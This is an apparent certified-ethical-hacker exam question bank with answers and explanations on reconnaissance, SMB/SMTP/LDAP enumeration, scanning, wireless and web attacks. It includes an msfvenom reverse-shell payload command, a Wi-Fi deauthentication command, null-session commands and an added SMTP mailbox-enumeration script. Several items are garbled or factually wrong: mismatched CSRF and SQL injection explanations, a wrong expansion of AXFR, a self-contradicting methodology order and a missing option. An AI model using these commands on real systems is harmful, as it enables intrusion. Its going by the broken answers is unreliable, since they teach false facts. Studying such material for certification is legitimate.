During a penetration test, you run the command `enum4linux -a 192.168.1.10` and receive output containing user account names, group memberships, and share listings. Which protocol is primarily being enumerated?
A.NFS
B.SMB
C.SNMP
D.SMTP
AnswerB
Correct. enum4linux performs SMB enumeration, extracting information like users, shares, and policies from Windows systems.
Why this answer
enum4linux is a tool specifically designed to enumerate information from Windows and Samba systems via the SMB (Server Message Block) protocol. The command `enum4linux -a 192.168.1.10` performs a comprehensive scan that retrieves user accounts, group memberships, and share listings, all of which are exposed through SMB's named pipe and RPC mechanisms. SMB is the correct protocol because it is the primary means for file and printer sharing in Windows networks, and enum4linux leverages SMB's IPC$ share and SAMR/LSA RPC services to extract this data.
Exam trap
The trap here is that candidates often confuse enum4linux with tools like 'showmount' for NFS or 'snmpwalk' for SNMP, but the key is that enum4linux is explicitly built for SMB enumeration, and the output of user accounts and shares is a hallmark of SMB, not NFS or SNMP.
How to eliminate wrong answers
Option A is wrong because NFS (Network File System) is a Unix/Linux-based file-sharing protocol that does not expose user account or group membership details via enum4linux; enum4linux is designed for SMB/CIFS environments, not NFS mounts. Option C is wrong because SNMP (Simple Network Management Protocol) is used for network device monitoring and management, not for enumerating user accounts or shares; enum4linux does not interact with SNMP agents. Option D is wrong because SMTP (Simple Mail Transfer Protocol) is an email delivery protocol and has no mechanism for listing user accounts, group memberships, or file shares; enum4linux targets SMB services, not mail servers.
Which TWO of the following are valid SMTP enumeration commands that can be used to discover valid email addresses? (Select 2)
Select 2 answers
A.HELO
B.RCPT TO
C.EXPN
D.ATRN
E.VRFY
AnswersC, E
EXPN expands a mailing list, revealing member addresses.
Why this answer
EXPN is a valid SMTP command that asks the server to expand a mailing list or alias, revealing the individual addresses that belong to it, and VRFY asks the server to confirm that a single mailbox exists. Both are defined in RFC 821 (now RFC 5321) and let an attacker discover valid email addresses without sending a message.
Exam trap
The trap here is that candidates confuse RCPT TO with VRFY or EXPN, thinking that specifying a recipient during mail delivery is the same as a dedicated enumeration command, but RCPT TO is part of the mail transaction flow and not a standalone enumeration command.
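The exchange in working code, as an added example that is not from the original question. probe_user() and expand_list() call the verify(), expn(), mail(), rcpt() and rset() methods of smtplib.SMTP, each of which returns the server's (code, message) reply. Because many MTAs disable VRFY and EXPN (answering 252 or 502), probe_user() falls back to a RCPT TO probe inside a transaction that is reset before any message is sent. FakeMTA is a constructed stand-in that answers like a typical server so the exchange runs offline; live_session() opens the real smtplib connection, and the host name in its usage comment is hypothetical.

```python
"""Enumerate mailbox names over SMTP with VRFY and EXPN, falling back to RCPT TO.

Added example, not from the original question. FakeMTA is a constructed
server model with the same reply shapes as smtplib.SMTP's methods.
"""
import smtplib

INVALID_CODES = {550, 551, 553}  # mailbox unavailable / not local / not allowed


def probe_user(smtp, user, domain, sender="probe@example.net"):
    """Return 'valid', 'invalid' or 'unknown' for user@domain.

    VRFY first; if the server refuses to verify (252, 500, 502 ...), start a
    transaction, try RCPT TO and then RSET it so nothing is delivered.
    """
    addr = f"{user}@{domain}"
    code, _msg = smtp.verify(addr)
    if code == 250:
        return "valid"
    if code in INVALID_CODES:
        return "invalid"
    smtp.mail(sender)
    code, _msg = smtp.rcpt(addr)
    smtp.rset()
    if code in (250, 251):
        return "valid"
    if code in INVALID_CODES:
        return "invalid"
    return "unknown"


def expand_list(smtp, alias):
    """Return the member addresses of a mailing list/alias via EXPN, or None."""
    code, msg = smtp.expn(alias)
    if code != 250:
        return None
    members = []
    for line in msg.decode("utf-8", "replace").splitlines():
        line = line.strip()
        if "<" in line and ">" in line:  # "Full Name <user@host>" -> user@host
            line = line[line.index("<") + 1:line.index(">")]
        if line:
            members.append(line)
    return members


def enumerate_users(smtp, candidates, domain):
    return {u: probe_user(smtp, u, domain) for u in candidates}


def live_session(host, port=25):
    """Real connection for an authorised test; caller closes it."""
    session = smtplib.SMTP(host, port)
    session.ehlo()
    return session


class FakeMTA:
    """Constructed server model: same reply shapes as smtplib.SMTP methods."""
    USERS = {"alice", "bob"}
    LISTS = {"staff": ["Alice <alice@example.com>", "Bob <bob@example.com>"]}

    def __init__(self, vrfy=True, expn=True):
        self.vrfy_enabled, self.expn_enabled = vrfy, expn
        self.log = []  # commands seen, in order

    def verify(self, addr):
        self.log.append(f"VRFY {addr}")
        if not self.vrfy_enabled:
            return 252, b"2.0.0 Cannot VRFY user, but will accept message"
        local = addr.split("@")[0]
        if local in self.USERS:
            return 250, f"2.1.5 <{local}@example.com>".encode()
        return 550, b"5.1.1 User unknown"

    def expn(self, alias):
        self.log.append(f"EXPN {alias}")
        if not self.expn_enabled:
            return 502, b"5.5.1 Command not implemented"
        if alias in self.LISTS:
            return 250, "\n".join(self.LISTS[alias]).encode()
        return 550, b"5.1.1 List unknown"

    def mail(self, sender):
        self.log.append(f"MAIL FROM:<{sender}>")
        return 250, b"2.1.0 Ok"

    def rcpt(self, addr):
        self.log.append(f"RCPT TO:<{addr}>")
        if addr.split("@")[0] in self.USERS:
            return 250, b"2.1.5 Ok"
        return 550, b"5.1.1 User unknown"

    def rset(self):
        self.log.append("RSET")
        return 250, b"2.0.0 Ok"


if __name__ == "__main__":
    mta = FakeMTA(vrfy=False)  # VRFY disabled: watch the RCPT TO fallback
    print(enumerate_users(mta, ["alice", "mallory"], "example.com"))
    print(expand_list(FakeMTA(), "staff"))
    print("\n".join(mta.log))
    # Authorised live use (hypothetical host): with live_session("mail.target.test") as s: ...
```

A server configured as a catch-all answers 250 to every RCPT TO, so a run in which every candidate comes back "valid" is a sign that the fallback is not discriminating anything, not a sign that every name exists.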
An analyst executes 'nmap -sU -p 161,162 10.0.0.1'. What is the primary purpose of this scan?
A.Detect TCP services on the target
B.Enumerate all open ports on the target
C.Discover SNMP services running on the target
D.Perform a SYN flood attack
AnswerC
UDP ports 161 (SNMP) and 162 (SNMP trap) are scanned.
Why this answer
The `-sU` flag instructs Nmap to perform a UDP scan, and the `-p 161,162` targets the default SNMP ports (UDP 161 for SNMP queries, UDP 162 for SNMP traps). This combination is specifically designed to discover SNMP services running on the target host, as SNMP runs over UDP by default (a TCP transport exists but is rarely deployed). Option C is correct because the command's primary purpose is to probe for SNMP services.
Exam trap
The trap here is that candidates often confuse `-sU` with TCP scans or assume the command scans all ports, but CEH specifically tests the understanding that `-sU` with `-p 161,162` targets SNMP over UDP, not general port enumeration or attacks.
How to eliminate wrong answers
Option A is wrong because `-sU` specifies a UDP scan, not a TCP scan; TCP services are detected using `-sT` or `-sS`, not `-sU`. Option B is wrong because the command only scans ports 161 and 162, not all ports; enumerating all open ports would require a broader port range (e.g., `-p-`) or a different scan type. Option D is wrong because a SYN flood attack is a denial-of-service technique using TCP SYN packets, whereas this is a reconnaissance scan using UDP probes; Nmap does not perform attacks by default.
A security analyst runs `nbtstat -A 192.168.1.10` and receives a response with the computer name, logged-in user, and domain. Which protocol is being queried?
A.NetBIOS
B.SNMP
C.LDAP
D.SMTP
AnswerA
Why this answer
The `nbtstat -A` command performs a NetBIOS name service query (NBNS) against the target IP address using UDP port 137. It retrieves the NetBIOS name table, which includes the computer name, logged-in user, and domain membership, directly from the NetBIOS over TCP/IP (NetBT) protocol stack.
Exam trap
The trap here is that candidates confuse `nbtstat -A` (which queries by IP address) with `nbtstat -a` (which queries by NetBIOS name) or assume it uses a different protocol like SMB; both forms send a NetBIOS Name Service query to UDP 137, and no SMB session on TCP 445 or 139 is involved.
How to eliminate wrong answers
Option B is wrong because SNMP (Simple Network Management Protocol) uses UDP ports 161/162 and is queried with tools like `snmpget` or `snmpwalk`, not `nbtstat`. Option C is wrong because LDAP (Lightweight Directory Access Protocol) operates over TCP port 389 and is used to query directory services like Active Directory, not to retrieve NetBIOS names. Option D is wrong because SMTP (Simple Mail Transfer Protocol) uses TCP port 25 for email transfer and has no role in NetBIOS name resolution or enumeration.
During a security assessment, a tester uses `nmap -sU 192.168.1.1`. What type of scan does this command perform?
A.UDP scan
B.TCP SYN scan
C.Ping sweep
D.OS fingerprinting
AnswerA
-sU scans UDP ports.
Why this answer
The `-sU` flag in Nmap explicitly instructs the tool to perform a UDP scan. This sends UDP packets to the target ports and analyzes responses (or lack thereof) to determine if a UDP port is open, closed, or filtered. Unlike TCP, UDP is connectionless, so the scan relies on ICMP unreachable messages or lack of response to infer port status.
Exam trap
The trap here is that candidates confuse the `-sU` flag with a TCP SYN scan (`-sS`) or assume it performs a general host discovery, but the question specifically tests knowledge of Nmap's scan type flags.
How to eliminate wrong answers
Option B is wrong because a TCP SYN scan uses the `-sS` flag, not `-sU`, and infers port state from the target's TCP reply to a SYN probe (SYN/ACK for open, RST for closed) without completing the three-way handshake. Option C is wrong because a ping sweep typically uses ICMP echo requests (or TCP/UDP probes to multiple hosts) to discover live hosts, not a single target with UDP probes; the command `nmap -sn` is used for ping sweeps. Option D is wrong because OS fingerprinting is performed with options like `-O` or `-A`, which analyze TCP/IP stack behavior, not a simple UDP scan.
A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
A.Generating a Trojan
B.Creating a virus
C.Deploying a worm
D.Initiating a DoS attack
AnswerA
The payload is a backdoor that allows remote control, characteristic of a Trojan.
Why this answer
Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).
Which THREE of the following are indicators that a system has been compromised by a rootkit? (Select 3)
Select 3 answers
A.Anti-virus software is disabled and cannot be restarted
B.Hidden processes that do not appear in process lists
C.Unexplained network connections to known command-and-control servers
D.Event logs show repeated successful logins from unknown IPs
E.Increased disk space usage without explanation
AnswersA, B, C
Rootkits may disable security software to avoid detection.
Why this answer
Rootkits hide processes, files, and registry keys. Common signs include hidden processes, unexplained network connections, and disabled security tools. Altered file hashes are also indicators but are more generic.
A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)
Select 2 answers
A.Use out-of-band SQL injection with DNS exfiltration
B.Use a time-based blind SQL injection with SLEEP() function
C.Leverage error-based SQL injection with CONVERT() or double query
D.Use SQLMap with --union-cols and --union-from flags
E.Implement parameterized queries in the application code
AnswersC, D
Error-based injection exploits verbose error messages to extract data.
Why this answer
Union-based SQL injection uses UNION SELECT to retrieve data from other tables. Error-based SQL injection leverages database error messages to extract information. Both are common in-band techniques suitable when errors are displayed.
While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?
The '../' patterns and the file path indicate directory traversal, resulting in file disclosure.
Why this answer
The path contains '../' sequences indicating directory traversal. A 200 response suggests the attacker successfully read the /etc/passwd file, leading to disclosure of system user accounts. This can aid further attacks like password cracking.
An incident responder analyzes logs and finds repeated failed zone transfer attempts from an external IP. The zone transfer requests are targeting the domain example.com. Which DNS record type, if misconfigured, would allow this attack to succeed?
A. NS records
B. AXFR
C. MX records
D. SOA records
Answer: B
AXFR is the DNS query type for zone transfers. Allowing AXFR from unauthorized hosts is a misconfiguration.
Why this answer
B is correct because AXFR (Asynchronous Full Transfer) is the DNS zone transfer protocol that, if misconfigured (i.e., allowing unrestricted AXFR queries from any IP), permits an external attacker to request and receive the entire DNS zone file for example.com. The repeated failed attempts indicate the attacker is probing for an open AXFR service, which would succeed if the DNS server is configured to allow zone transfers to any host without restriction.
Exam trap
The trap here is that candidates confuse the DNS record type (e.g., NS, SOA) with the protocol or query type (AXFR) used to perform the zone transfer, leading them to select a record type instead of recognizing AXFR as the specific misconfiguration that enables the attack.
How to eliminate wrong answers
Option A is wrong because NS records specify the authoritative name servers for a domain, not the mechanism for transferring zone data; misconfigured NS records could lead to delegation issues but do not directly allow zone transfer attacks. Option C is wrong because MX records define mail exchange servers for email routing and have no role in DNS zone transfers; they are irrelevant to the attack described. Option D is wrong because SOA records contain administrative metadata about the zone (e.g., serial number, refresh interval) but do not control or enable zone transfer requests; misconfigured SOA records might affect zone replication timing but not allow external AXFR queries.
Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?
Select 2 answers
A. Using SameSite cookies
B. Input validation
C. Using anti-CSRF tokens
D. Using HTTPOnly cookies
E. Using CSRF tokens
Answers: A, E
SameSite cookies restrict cookie sending on cross-site requests, mitigating CSRF.
Why this answer
CSRF tokens and SameSite cookies are standard defenses. The other options do not prevent CSRF: input validation does not address it; "anti-CSRF tokens" is simply another name for CSRF tokens; Referer header validation is a weak control.
You are a security analyst for a medium-sized company. The company uses a custom web application for internal project management. The application uses AES-256-CBC for encrypting sensitive data stored in the database. Recently, the company experienced a data breach where an attacker exfiltrated the entire database. Although the data was encrypted, the attacker was able to decrypt some records. Investigation reveals that the encryption key is stored in a configuration file on the same server, and the initialization vector (IV) is hardcoded in the application code. Additionally, the application uses the same key for all records. Which of the following is the most effective remediation to prevent future decryption of stolen encrypted data?
A. Change the encryption mode from CBC to GCM to provide authentication
B. Store the encryption key in a hardware security module (HSM) and use the same key
C. Rotate the encryption key every 24 hours
D. Implement per-record encryption keys derived from a master key combined with a unique salt
Answer: D
Each record gets a unique key; compromise of one key does not affect others.
Why this answer
Option D is correct because using per-record encryption keys derived from a master key combined with a unique salt ensures that even if an attacker exfiltrates the entire database, each encrypted record requires a separate key derivation operation. Without each record's unique salt, the attacker cannot decrypt all records even if they compromise the master key. This approach mitigates the risk of a single key compromise leading to bulk decryption, which is the core vulnerability in the current setup, where the same AES-256-CBC key and hardcoded IV are reused across all records.
Exam trap
The trap here is that candidates often focus on key storage or rotation (options B and C) as the primary solution, overlooking that the real vulnerability is the reuse of a single key across all records, which allows an attacker to decrypt the entire dataset with a single key compromise.
How to eliminate wrong answers
Option A is wrong because changing the encryption mode from CBC to GCM adds authentication (integrity) but does not address the fundamental issue of a single static key and IV being reused; an attacker who steals the database and the key can still decrypt all records regardless of the mode. Option B is wrong because storing the encryption key in an HSM while still using the same key for all records does not prevent an attacker from decrypting all stolen data if they compromise the application at runtime or obtain the key from the HSM via authorized access; the HSM protects the key at rest but does not mitigate the single-key reuse vulnerability. Option C is wrong because rotating the encryption key every 24 hours only limits the window of exposure for future records; it does not protect already exfiltrated encrypted data that was encrypted with the old key, and the attacker can still decrypt all records encrypted before the rotation if they have the old key.
During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
A. Session hijacking
B. MAC flooding
C. DNS spoofing
D. ARP poisoning
Answer: D
ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.
Why this answer
ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.
A penetration tester runs the following command against a Linux server: `smbclient -L //192.168.1.10 -N`. The output lists shares including 'IPC$', 'ADMIN$', and 'data'. Which of the following is the BEST next step to enumerate the 'data' share?
B. Run `enum4linux -a 192.168.1.10` to gather more information
C. Use `rpcclient -U '' 192.168.1.10` to enumerate users
D. Use `smbclient //192.168.1.10/data -N` to attempt a null session connection
Answer: D
This attempts to access the share anonymously; if successful, the tester can list files.
Why this answer
The command `smbclient -L //192.168.1.10 -N` performs a null session (no password) listing of SMB shares. The output shows that the 'data' share exists and is accessible without authentication (since the -N flag succeeded). The best next step is to attempt a null session connection to that specific share using `smbclient //192.168.1.10/data -N`, which will mount the share and allow file enumeration.
This directly leverages the null session already confirmed by the initial scan.
Exam trap
The trap here is that candidates often choose a broad enumeration tool like enum4linux or an nmap script, thinking they need more information first, when the direct connection to the already-discovered share is the logical and efficient next step in a penetration test.
How to eliminate wrong answers
Option A is wrong because `nmap --script smb-enum-shares -p 445` would re-enumerate shares, which is redundant after already discovering the 'data' share via smbclient. Option B is wrong because `enum4linux -a` is a comprehensive enumeration tool that gathers users, groups, shares, and policies, but it is a broader, slower step that does not directly access the 'data' share; the immediate goal is to connect to the share, not gather more metadata. Option C is wrong because `rpcclient -U ''` is used for RPC-based enumeration (e.g., users, SIDs) via the IPC$ share, not for accessing a file share like 'data'; it would not list or retrieve files from the 'data' share.
A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
Select 2 answers
A. Smurf attack
B. Volumetric attack
C. Application-layer (Layer 7) attack
D. SYN flood attack
E. Distributed denial-of-service (DDoS) attack
Answers: C, E
HTTP GET requests targeting a specific page are application-layer.
Why this answer
An HTTP flood is an application-layer DDoS that sends many seemingly legitimate requests; "distributed" means the requests come from many sources. Volumetric floods rely on raw bandwidth, and a SYN flood abuses the TCP handshake, so neither matches a stream of well-formed HTTP GET requests.
During a penetration test, a tester captures a WPA2 4-way handshake. Which of the following is the NEXT step to attempt to recover the Wi-Fi passphrase?
A. Use aircrack-ng to crack the WEP key from the handshake
B. Run a dictionary attack using aircrack-ng with a wordlist
C. Brute-force the WPS PIN using Reaver
D. De-authenticate the client from the network again to capture another handshake
Answer: B
The captured handshake is used for offline password cracking against a wordlist.
Why this answer
After capturing the handshake, the tester must perform a dictionary attack against the handshake file. Tools like aircrack-ng or hashcat can compare the handshake against a wordlist of potential passphrases.
A penetration tester uses the following Google dork: site:example.com filetype:pdf inurl:confidential. What is the MOST likely goal of this search?
A. Retrieve all PDF files from example.com regardless of content
B. Identify all web pages on example.com that link to PDF files
C. Find PDF files on example.com that have 'confidential' in their filename or path
D. Discover PDF files that contain the word 'confidential' on example.com
Answer: C
The 'inurl:confidential' operator matches the string 'confidential' anywhere in the URL, which includes filenames and directory paths. Combined with 'filetype:pdf', this finds PDFs with 'confidential' in the URL.
Why this answer
The Google dork `site:example.com filetype:pdf inurl:confidential` combines the `site` operator to restrict results to example.com, `filetype:pdf` to filter for PDF files, and `inurl:confidential` to require that the URL or path contains the word 'confidential'. This targets PDF files whose filename or directory path includes 'confidential', making option C correct. The `inurl` operator matches the URL string, not the file content, so it does not search within the PDF text.
Exam trap
The trap here is confusing `inurl` (which searches the URL string) with `intext` or content-based search, leading candidates to incorrectly assume the dork finds PDFs containing the word 'confidential' inside the document.
How to eliminate wrong answers
Option A is wrong because the dork includes `inurl:confidential`, which narrows results to PDFs with 'confidential' in the URL, not all PDFs. Option B is wrong because the dork retrieves PDF files directly, not web pages that link to PDFs; `filetype:pdf` returns the PDF file itself. Option D is wrong because `inurl` searches the URL string, not the content of the PDF; to search within file content, one would use `intext` or `filetype:pdf` combined with a content search term like `"confidential"` without `inurl`.
A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
A. Smurf attack
B. Ping of Death
C. SYN flood
D. Slowloris
Answer: A
ICMP echo requests sent to a broadcast address with a spoofed source IP are the signature of a Smurf attack.
Why this answer
A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.
Which of the following Google dorks would an attacker MOST likely use to find login pages of web applications that are publicly accessible?
A. intitle:login
B. inurl:robots.txt
C. filetype:pdf
D. cache:example.com
Answer: A
This dork returns pages where the title contains 'login', often used to find login portals.
Why this answer
The Google dork 'intitle:login' is most effective for finding login pages because it searches for the word 'login' in the HTML title tag of web pages. Attackers use this to quickly identify publicly accessible authentication portals, which are common entry points for brute-force or credential-stuffing attacks. This dork directly targets the page title, a standard HTML element that often contains the word 'login' on authentication pages.
Exam trap
EC-Council often tests the distinction between operators that find specific page content (like 'intitle:') versus those that find file types or cached data, leading candidates to confuse 'inurl:robots.txt' (which finds a specific file) with finding login pages.
How to eliminate wrong answers
Option B is wrong because 'inurl:robots.txt' is used to find the robots.txt file, which discloses directories that the site owner wants to hide from search engines, not login pages. Option C is wrong because 'filetype:pdf' restricts results to PDF files, which are unlikely to be login pages (login pages are typically HTML). Option D is wrong because 'cache:example.com' shows the cached version of a specific domain, not a search for login pages across multiple sites.
During a penetration test, you gain access to a target system as a low-privileged user. Which of the following is the BEST next step according to the CEH system hacking methodology (CHPSET)?
A. Execute applications to extract data
B. Hide files to conceal tools and data
C. Erase event logs to avoid detection
D. Escalate privileges to gain higher-level access
Answer: D
Privilege escalation is the third step in CHPSET, following cracking passwords and hiding files, and is appropriate after initial low-privileged access.
Why this answer
The CEH methodology follows: Cracking passwords, Hiding files, Privilege escalation, Executing applications, Spying, Erasing tracks. After gaining initial access as a low-privileged user, the next logical step is to escalate privileges to gain higher access (e.g., administrator or root).
Which of the following tools would be BEST to use for identifying all live hosts in a large IP range (e.g., 10.0.0.0/8) quickly?
A. Masscan
B. OpenVAS
C. Nmap with -sL flag
D. hping3
Answer: A
Masscan is optimized for speed and can scan large ranges quickly.
Why this answer
Masscan is the best choice because it is designed for high-speed scanning across large IP ranges, capable of transmitting packets at rates exceeding 10 million packets per second. It uses asynchronous transmission and raw sockets to quickly identify live hosts by sending SYN probes and analyzing responses, making it ideal for scanning a /8 subnet (16.7 million addresses) in minutes.
Exam trap
EC-Council often tests the distinction between scanning speed and functionality, where candidates mistakenly choose Nmap (a versatile tool) for large-range host discovery without recognizing that its default scanning modes are too slow for a /8 subnet, whereas Masscan is purpose-built for speed.
How to eliminate wrong answers
Option B (OpenVAS) is wrong because it is a vulnerability scanner that performs in-depth analysis on identified hosts, not a tool for rapid host discovery across large ranges; its scanning speed is too slow for a /8 subnet. Option C (Nmap with -sL flag) is wrong because the -sL flag performs a list scan that only resolves DNS names without sending any packets, so it cannot identify live hosts. Option D (hping3) is wrong because it is a packet crafting tool used for targeted testing and firewall auditing, not designed for high-speed scanning of massive IP ranges; its sequential packet transmission makes it impractical for a /8 subnet.
During a penetration test, an ethical hacker runs the following command: aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon. What is the immediate effect of this command?
A. It performs a WEP injection attack to generate traffic
B. It cracks the pre-shared key using a dictionary
C. It forces the client to disconnect and reconnect, capturing the WPA handshake
D. It initiates a brute force attack on the WPS PIN
Answer: C
Deauthentication attack (aireplay-ng -0) disconnects a client; reconnection allows capture of the 4-way handshake.
Why this answer
The -0 flag sends deauthentication packets to force a client to reconnect, enabling capture of the WPA handshake.
A security analyst suspects that an attacker is scanning their network. They notice a large number of TCP SYN packets being sent to various ports on a single host, but no SYN-ACK responses are returned. Which type of scan is most likely being used?
A. TCP connect scan
B. UDP scan
C. SYN scan
D. FIN scan
Answer: C
SYN scan sends SYN packets; lack of SYN-ACK indicates filtered/closed ports.
Why this answer
C is correct because a SYN scan (also known as a half-open scan) sends TCP SYN packets to target ports and does not complete the three-way handshake. If no SYN-ACK is returned, it indicates the port is filtered or the host is not responding, which matches the scenario where the attacker receives no SYN-ACK responses. This scan is stealthier than a full TCP connect scan because it never establishes a full connection.
Exam trap
The trap here is that candidates often confuse SYN scan with TCP connect scan, thinking that any TCP scan must complete the handshake, but the key distinction is that SYN scan never sends the final ACK, making it half-open and stealthier.
How to eliminate wrong answers
Option A is wrong because a TCP connect scan completes the full three-way handshake (SYN, SYN-ACK, ACK) and would result in SYN-ACK responses for open ports, not the absence of them. Option B is wrong because a UDP scan sends UDP packets, not TCP SYN packets, and relies on ICMP unreachable messages or lack of response, not TCP SYN-ACK behavior. Option D is wrong because a FIN scan sends TCP packets with the FIN flag set, not SYN packets, and expects RST responses for closed ports, not SYN-ACKs.
A penetration tester calls an employee claiming to be from the IT help desk and asks for their password to perform a 'security update'. The employee provides the password. Which social engineering technique is being used?
A. Pretexting
B. Tailgating
C. Quid pro quo
D. Phishing
Answer: A
Pretexting uses a fabricated scenario to obtain information.
Why this answer
The attacker is fabricating a scenario (IT help desk performing a security update) to manipulate the target into revealing sensitive information. This is the essence of pretexting, where the attacker creates a false identity or situation to gain trust and extract data. Unlike phishing, which typically uses malicious links or attachments, this attack relies purely on verbal impersonation and social manipulation.
Exam trap
The trap here is that candidates confuse pretexting with phishing because both involve deception, but phishing specifically uses electronic channels (email, fake login pages) while pretexting can occur over voice or in person without any technical payload.
How to eliminate wrong answers
Option B is wrong because tailgating involves physically following an authorized person into a restricted area without their consent, not deceiving someone over the phone. Option C is wrong because quid pro quo involves offering a service or benefit in exchange for information (e.g., 'I'll fix your computer if you give me your password'), whereas here the attacker simply demands the password under a false pretense. Option D is wrong because phishing typically uses electronic communication (email, SMS, fake websites) to trick victims into clicking a link or downloading malware, not a direct phone call asking for credentials.
During a penetration test, the tester wants to discover all subdomains of a target domain using an OSINT technique. Which tool is specifically designed for subdomain enumeration via search engines and public records?
A. theHarvester
B. Maltego
C. Shodan
D. dnsrecon
Answer: A
theHarvester is designed to gather emails, subdomains, and other information from public sources.
Why this answer
theHarvester is specifically designed to perform OSINT-based subdomain enumeration by querying search engines (e.g., Google, Bing) and public data sources (e.g., PGP key servers, DNSDumpster). It collects email addresses, subdomains, IPs, and virtual hosts without direct interaction with the target's infrastructure, making it ideal for passive reconnaissance.
Exam trap
EC-Council often tests the distinction between passive OSINT tools (theHarvester) and active reconnaissance tools (dnsrecon), so candidates mistakenly choose dnsrecon because it is a DNS tool, but the question explicitly requires an OSINT technique using search engines and public records.
How to eliminate wrong answers
Option B (Maltego) is wrong because it is a general-purpose OSINT and link-analysis platform that requires transforms (some of which are paid) and is not solely focused on subdomain enumeration via search engines; it is overkill for this specific task. Option C (Shodan) is wrong because it is a search engine for internet-connected devices and services (e.g., IoT, servers), not for enumerating subdomains of a target domain via search engines or public records. Option D (dnsrecon) is wrong because it performs active DNS reconnaissance (e.g., zone transfers, brute-force subdomain discovery) and is not an OSINT technique that relies on search engines and public records.
During a penetration test, you discover an LDAP server on port 389 that allows anonymous binds. Which of the following enumeration techniques would provide the MOST comprehensive information about the directory structure?
A. Run nmap with the smb-enum-shares script
B. Perform a DNS zone transfer
C. Use ldapsearch to query the directory for all attributes
D. Use net view to list domain resources
Answer: C
ldapsearch can retrieve all objects and attributes from an LDAP directory, especially with anonymous bind.
Why this answer
Option C is correct because `ldapsearch` with anonymous bind allows querying the LDAP directory for all attributes and entries, providing comprehensive information about the directory structure, including user accounts, groups, organizational units, and other objects. LDAP servers on port 389 often expose the entire directory tree when anonymous binds are permitted, making `ldapsearch` the most effective enumeration technique.
Exam trap
The trap here is that candidates confuse LDAP enumeration with SMB or DNS enumeration, assuming any network discovery tool will work, but only LDAP-specific queries (like `ldapsearch`) can extract directory structure from an LDAP server.
How to eliminate wrong answers
Option A is wrong because `nmap` with the `smb-enum-shares` script targets SMB (port 445) and enumerates Windows file shares, not LDAP directory structure on port 389. Option B is wrong because DNS zone transfer (using `dig` or `nslookup`) retrieves DNS records (A, MX, CNAME, etc.) from a DNS server, not LDAP directory attributes or objects. Option D is wrong because `net view` is a Windows command that lists SMB shared resources on a network, not LDAP directory entries.
An IoT device uses the MQTT protocol without TLS. An attacker on the same network captures messages and publishes a fake temperature reading. Which attack is being executed?
A. Replay attack
B. Firmware reversing attack
C. Man-in-the-middle attack
D. Denial of service attack
Answer: C
The attacker intercepts and injects messages, which is MITM on an unencrypted MQTT session.
Why this answer
MQTT over plain TCP allows message interception and injection (man-in-the-middle) because no encryption or authentication is enforced.